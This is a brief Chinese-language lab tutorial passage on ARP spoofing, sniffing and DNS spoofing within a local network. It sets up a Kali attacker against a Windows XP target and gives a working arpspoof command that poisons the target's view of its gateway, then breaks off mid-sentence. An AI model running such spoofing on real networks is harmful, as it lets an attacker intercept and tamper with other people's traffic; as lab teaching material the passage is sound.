局域網下ARP欺騙、嗅探,以及DNS欺騙

  準備:kali、xp kali ip:192.168.14.157 目標ip:192.168.14.158 目標網關:192.168.14.2   ARP欺騙: arpspoof -t 目標ip -r 目標網關 命令:arpspoof  -i  eth0 -t 192.168.14.158 -r 192.168.14.2    我們可以看到xp認爲網關的MAC地址和KAli是一樣的 顯示我們欺
相關文章
相關標籤/搜索